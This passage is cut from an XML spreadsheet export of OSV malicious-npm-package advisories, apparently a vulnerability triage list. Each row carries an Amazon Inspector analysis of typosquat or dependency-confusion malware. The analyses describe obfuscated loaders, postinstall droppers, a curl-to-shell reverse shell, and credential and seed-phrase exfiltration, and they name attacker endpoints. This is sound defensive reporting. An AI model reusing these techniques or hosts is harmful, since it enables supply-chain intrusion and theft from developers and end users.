      <c r="F165" s="5" t="inlineStr"/>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-plus</t>
        </is>
      </c>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr"/>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (02d908da8470ad86669b080d267b57174ccd77e5fd6ed2c371c430d98e869f2b)
hardhat-plus@2.21.0 is published under a name resembling the Ethereum development tool 'hardhat' but ships README, type definitions, and docs copied verbatim from the unrelated pino logger project (README.md references npmjs.com/package/pino; index.d.ts references github.com/pinojs/pino.git; package.json description is unrelated boilerplate). The package's main entry index.js requires./lib/config, which is a single ~4.5MB heavily obfuscated file using obfuscator.io transforms: hex-named identifiers, a self-mutating shuffled string-array (while(!![]){...f['push'](f['shift']())}), control-flow flattening, dispatched decode helpers, and pervasive \xNN escape literals. This opaque code runs unconditionally the moment the package is imported. There is no legitimate source, minification story, or documented purpose that accounts for a multi-megabyte obfuscated blob being loaded as a 'config' module in a package that presents itself as either a Hardhat plugin or a pino logger. The combination of name-based impersonation, mismatched cover-story documentation, and an obfuscated payload auto-executed on import is the standard delivery shape for supply-chain malware.
</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17508</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17509</t>
        </is>
      </c>
      <c r="D166" s="5" t="inlineStr"/>
      <c r="E166" s="5" t="inlineStr"/>
      <c r="F166" s="5" t="inlineStr"/>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-roof</t>
        </is>
      </c>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr"/>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (25cbf03ad6014824ab078237f83b2b682145928e5effefbe3dcc5deca9ba1e26)
The package presents itself as the pino logger — README, docs/, index.d.ts and LICENSE are copied from pinojs/pino and keywords advertise 'fast, logger, stream, json' — but the package name is 'hardhat-roof', the description references unrelated vulnerability-management functionality, and the author points to jsonspack.com rather than the pino maintainers. The top of index.js executes `require('./lib/config')`, which loads lib/config.js: a 4,373,384-byte file containing obfuscator.io-style string-array obfuscation with a self-rotating decoder (`n['push'](n['shift']())` loop gated by a parseInt sum), hex-escaped character lookups, and dozens of single-letter indirection functions. The remaining lib/ files are small and consistent with pino; only config.js is the oversized opaque blob, and the real pino has no such file. Any consumer that imports or requires this package therefore executes several megabytes of opaque code in-process at load time. The combination of a doppelganger cover story cloned from a popular logger, a mismatched package name and author, and a reachable load-time execution path into a heavily obfuscated multi-megabyte payload is the shape of a trojanized typosquat/doppelganger delivering attacker-controlled code into installer processes.
</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17509</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17510</t>
        </is>
      </c>
      <c r="D167" s="5" t="inlineStr"/>
      <c r="E167" s="5" t="inlineStr"/>
      <c r="F167" s="5" t="inlineStr"/>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr">
        <is>
          <t>npm:internallib_v275</t>
        </is>
      </c>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr"/>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (80c1c6d383b3defb01da235e39e08ce56276d887e63d900aea2ee689836f71b4)
index.js exports a `command` function that invokes `/bin/bash -c` to curl a reverse-shell payload from reverse-shell.sh targeting the hardcoded host 10.0.49.106:443 and pipes the response to `sh`, yielding interactive remote shell access on the installer host whenever the exported API is called. The fetch-and-execute path has no pinning, no hash verification, and runs over an unauthenticated network retrieval. package.json also declares a self-referential dependency on `internallib_v275@^1.0.0`, a dependency-confusion shape consistent with a package targeting an internal registry namespace so that resolution against the public registry pulls this backdoor into internal builds.
</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17510</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17511</t>
        </is>
      </c>
      <c r="D168" s="5" t="inlineStr"/>
      <c r="E168" s="5" t="inlineStr"/>
      <c r="F168" s="5" t="inlineStr"/>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr">
        <is>
          <t>npm:lite-mater</t>
        </is>
      </c>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr"/>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (532663c4102d3cf7310e29ca1eb2b389c5c32c1e541da219b7c4364968f4e807)
package.json declares a postinstall lifecycle hook `wscript.exe 4444.vbs` that runs automatically on `npm install` on Windows hosts. The shipped 4444.vbs (~765 KB) is a multi-layer obfuscated loader: an embedded payload is stored as a large ArtifactBundleHX[] string array, Base64-decoded via MSXML DOM into a byte buffer, then decrypted through a custom XOR routine, an AES forward S-box, and a ChaCha20-IETF stream layer. The reconstructed payload is written to %TEMP%\pfNNNNN.dat and handed to powershell.exe via a two-tier loader whose in-source comments reference PowerShell process hollowing. Identifier and comment strings (`Device Telemetry Aggregator`, `Verdant Signals Corp`) act as a cover story, and the README explicitly claims the package has `No installation scripts` — directly contradicting the postinstall hook. The package ships no library code or legitimate functionality consistent with its stated purpose; its only install-time effect is to detonate the obfuscated Windows loader on the installer's machine.
</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17511</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17512</t>
        </is>
      </c>
      <c r="D169" s="5" t="inlineStr"/>
      <c r="E169" s="5" t="inlineStr"/>
      <c r="F169" s="5" t="inlineStr"/>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr">
        <is>
          <t>npm:lite-matte</t>
        </is>
      </c>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr"/>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4e7b0ae9e42c334c1c22627e60add7a2c5a0d558a2ab65a3af0043e27bb0e686)
package.json declares `"postinstall": "wscript.exe 4444.vbs"`, causing `npm install` to auto-execute a ~765KB Windows Script Host file shipped in the tarball. 4444.vbs is heavily obfuscated: it reconstructs COM ProgIDs (ADODB.Stream, MSXML2.XMLHTTP) at runtime via a Chr/XOR helper, uses XOR-masked hex tables for AES S-boxes and SHA-256 round constants, and stores its real payload as ~700 Base64-shaped chunks in an `ArtifactBundleHX` array decrypted through AES-256-CBC followed by ChaCha20-IETF. The decrypted PowerShell loader is written to `%TEMP%` and handed off to powershell.exe with comments indicating process hollowing. The declared package purpose (a trivial 60-line zod-based email domain checker at src/index.js) is unrelated to the dropper, and the README explicitly states 'No installation scripts. No network requests.' while the manifest ships exactly that. Header cover story labels the script 'Verdant Signals Corp. Device Telemetry Aggregator'.
</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17512</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17513</t>
        </is>
      </c>
      <c r="D170" s="5" t="inlineStr"/>
      <c r="E170" s="5" t="inlineStr"/>
      <c r="F170" s="5" t="inlineStr"/>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="inlineStr"/>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr"/>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr">
        <is>
          <t>npm:lite-matterr</t>
        </is>
      </c>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr"/>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (cc9b5f5edaae9103fd26de7cb70e661d78d6948dc3c519fec6b4b62fd471fbfc)
lite-matterr@1.0.0 declares a postinstall hook in package.json that runs `wscript.exe 4444.vbs` on `npm install`. The bundled 4444.vbs is a ~765KB heavily obfuscated VBScript containing layered decryption routines (XOR-masked AES S-boxes, a ChaCha20 stream layer, SHA-256 round constants XORed with 0x5A5A5A5A) and a ~600-entry base64 bundle that it concatenates and decrypts into a PowerShell loader. The decrypted loader is written to %TEMP%\pf&lt;rand&gt;.dat and executed via powershell.exe, with internal comments referencing process hollowing. The README falsely claims 'No network requests. No personal data storage. No installation scripts.', directly contradicting the declared postinstall. The package presents a 'Device Telemetry Aggregator' cover story while actually delivering a multi-stage Windows dropper that achieves code execution on any host that installs the package.
</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17513</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17514</t>
        </is>
      </c>
      <c r="D171" s="5" t="inlineStr"/>
      <c r="E171" s="5" t="inlineStr"/>
      <c r="F171" s="5" t="inlineStr"/>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr"/>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr">
        <is>
          <t>npm:minimal-a11y-contrast-check</t>
        </is>
      </c>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr"/>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d9a198e6fb2c5e31bc841ff12f210e630abe8629853faf4ea961a124a9be8a25)
Despite being advertised as a WCAG contrast checker, the package executes a self-invoking function at module load that runs host reconnaissance commands (whoami, id, hostname, uname -a, ls -la /, pwd, cat /etc/os-release) and collects filtered environment variables, then exfiltrates the results via DNS subdomain requests to davdpb8lhot13kgmnhp0863x9g83mpswq.oast.live and HTTP GET parameters to webhook.site/0492a36c-4d7b-408a-865c-226db25987ba. The exfiltration fires on any import of the package. Additionally, the module exports factories named after Wix Thunderbolt internal registries (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry) and ships a registry-manifest.min.json pointing at static.parastorage.com/unpkg/minimal-a11y-contrast-check@1.0.0, impersonating internal Wix build infrastructure to be resolved via dependency confusion. A hardcoded 'internetbrands' tag embedded in the exfiltration payload indicates targeted reconnaissance.
</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17514</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17515</t>
        </is>
      </c>
      <c r="D172" s="5" t="inlineStr"/>
      <c r="E172" s="5" t="inlineStr"/>
      <c r="F172" s="5" t="inlineStr"/>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr">
        <is>
          <t>npm:monitoring-agent</t>
        </is>
      </c>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr"/>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (703c1e796904571c9f0d08a4769a5f7e25a646483b4a66815a6ddc420ae0ecee)
The package exports an Express middleware (`monitor()`) advertised as a monitoring tool. On every response finish, the middleware POSTs the inbound HTTP request to a hardcoded author-controlled host at https://backend-cybersecuritydashboard.onrender.com/api/events. The payload explicitly extracts `req.body.password`, `req.body.username`, and `req.body.email` as dedicated fields alongside the full request headers, body, query string, and route params. The destination URL is not configurable by the caller — the only caller-supplied value is an apiKey. Any Express application that mounts this middleware will silently forward its end users' plaintext credentials and complete request payloads to this third-party Render host on every request. The package.json uses placeholder author metadata (`Your Name`) with no repository or homepage, and the exfiltration destination is unrelated to any disclosed publisher.
</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17515</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17516</t>
        </is>
      </c>
      <c r="D173" s="5" t="inlineStr"/>
      <c r="E173" s="5" t="inlineStr"/>
      <c r="F173" s="5" t="inlineStr"/>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr"/>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr">
        <is>
          <t>npm:oleh-modal</t>
        </is>
      </c>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr"/>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (cf2aebc282014a7dfa6ef1726083d23bcc9cc3eca76c814d4e775b7b10021545)
Package oleh-modal@1.0.0 is a credential-harvesting phishing kit disguised as a wallet-connect modal component. It renders fake MetaMask/Phantom/Rabby/OKX 'restore vault' modals that link to the legitimate extensions' restore-vault URLs to reinforce the deception, then captures the user's typed seed phrase / password characters via sendKeyToBackendAPI and POSTs them to a hardcoded backend at https://api.wagmiwallet.org/api/keys along with wallet_type, user_id, and enriched geolocation metadata (IP via api.ipify.org, city/region/country via ipapi.co). A persistent WebSocket connection to wss://api.wagmiwallet.org subscribes to a 'showMacModal' event that lets a remote operator trigger a spoofed macOS admin-authentication prompt on demand in the host application; captured mac_user_name and keystrokes from that dialog are forwarded through the same exfiltration path. Configuration references serverUrl 'https://wagmirequest.la' and backendUrl 'https://api.wagmiwallet.org', typosquats of wagmi.sh. Any consumer application that renders this component will forward its end users' wallet mnemonics and OS credentials to the attacker endpoint.
</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17516</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17517</t>
        </is>
      </c>
      <c r="D174" s="5" t="inlineStr"/>
      <c r="E174" s="5" t="inlineStr"/>
      <c r="F174" s="5" t="inlineStr"/>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="inlineStr"/>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr">
        <is>
          <t>npm:popover-anchor-polyfill</t>
        </is>
      </c>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr"/>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (31e270ae326e5c45ebeb5fcf7bc9ff96126908c194bef5f280a4028fff0e9ed9)
The package advertises itself as a 'popover anchor positioning polyfill' but ships thunderboltRegistry.js, which executes an IIFE on module load that spawns shell commands via child_process.execSync (`id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`) and reads `/etc/hosts`, then transmits each command's output together with hostname, Node version, platform, and pid over plain HTTP GET requests to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. The require path uses cache-bypass tricks (deleting require.cache entries matching 'thunderboltRegistry' and manually constructing a fresh Module to re-resolve child_process) to defeat mocking or interception. Sibling stub files and a `registry-manifest.min.json` impersonate Wix thunderbolt internal registry names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry) and reference static.parastorage.com, indicating a dependency-confusion lure targeting Wix build pipelines. The declared polyfill purpose does not match the shipped Wix-internal namespace exports, and no popover-polyfill functionality is implemented.
</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17517</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17518</t>
        </is>
      </c>
      <c r="D175" s="5" t="inlineStr"/>
      <c r="E175" s="5" t="inlineStr"/>
      <c r="F175" s="5" t="inlineStr"/>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="inlineStr"/>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr">
        <is>
          <t>npm:postcss-gap-fallback-util</t>
        </is>
      </c>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr"/>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5b54d5bd893bc377a77503059998e01ae3e338fd4d8ddac6fe2d7c71a3157cb5)
The package is published as a PostCSS gap fallback utility but ships thunderboltRegistry.js, which executes an IIFE on module load. The IIFE runs whoami, id, and hostname via child_process.execSync, curls the AWS instance metadata service at http://169.254.169.254/latest/meta-data/ for IAM role, instance-id, availability zone, and local IPv4, and sends the results to https://webhook.site/0492a36c-4d7b-408a-865c-226db25987ba along with DNS beacons to a host under oast.live. A registry-manifest.min.json maps multiple Wix-internal registry names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, dataBindingRegistry, thunderboltBuilderRegistry, thunderboltPreviewRegistry) to the same exfiltration file, and the module exports a Proxy returning no-op registry methods as a façade. The naming, manifest, and façade indicate a dependency-confusion payload targeting Wix build infrastructure; on any installer that requires one of the impersonated module names, shell identity, hostname, and (on EC2) AWS IAM role credentials/metadata are leaked to an attacker-controlled webhook and DNS collector.
</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17518</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17519</t>
        </is>
      </c>
      <c r="D176" s="5" t="inlineStr"/>
      <c r="E176" s="5" t="inlineStr"/>
      <c r="F176" s="5" t="inlineStr"/>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="inlineStr"/>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr">
        <is>
          <t>npm:promises-dotenv3</t>
        </is>
      </c>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr"/>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (146d9688d00e8fa785e2fb62976f0dad169e8055c6c92d3795536cc63527c640)
promises-dotenv3@1.0.0 is a typosquat of dotenv-family packages that executes an obfuscated payload at module load. On top-level require of the package's main entry and its CLI, a function named `dispatchAnalytics` reads a payload hidden in an APP13 JFIF segment of a bundled image (dist/stest.jpg), writes a randomly-named VBS file (relay_*.vbs) to the OS temp directory, and spawns wscript.exe (detached) to invoke powershell.exe with -NoProfile -NonInteractive -EncodedCommand and the extracted content; the VBS self-deletes after launch. The interpreter names and PowerShell switches are assembled from joined string fragments ("power"+"shell"+".exe", "wscript"+".exe", split -No/Profile, -Non/Interactive, -Encoded/Command) to evade static string matching. The bundled package.json inside dist/cli.cjs identifies itself as `node-env-buffer` v2.2.6, indicating the same payload is being published under multiple dotenv-adjacent names. Installing or requiring this package runs attacker-controlled PowerShell on the installer's Windows host.
</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17519</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17520</t>
        </is>
      </c>
      <c r="D177" s="5" t="inlineStr"/>
      <c r="E177" s="5" t="inlineStr"/>
      <c r="F177" s="5" t="inlineStr"/>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr">
        <is>
          <t>npm:rgx33-css-grid-utils</t>
        </is>
      </c>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr"/>
      <c r="S177" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (320488b79c9000782e398425aa1a2fddba7f29a487913bbb2fc2019405c078f5)
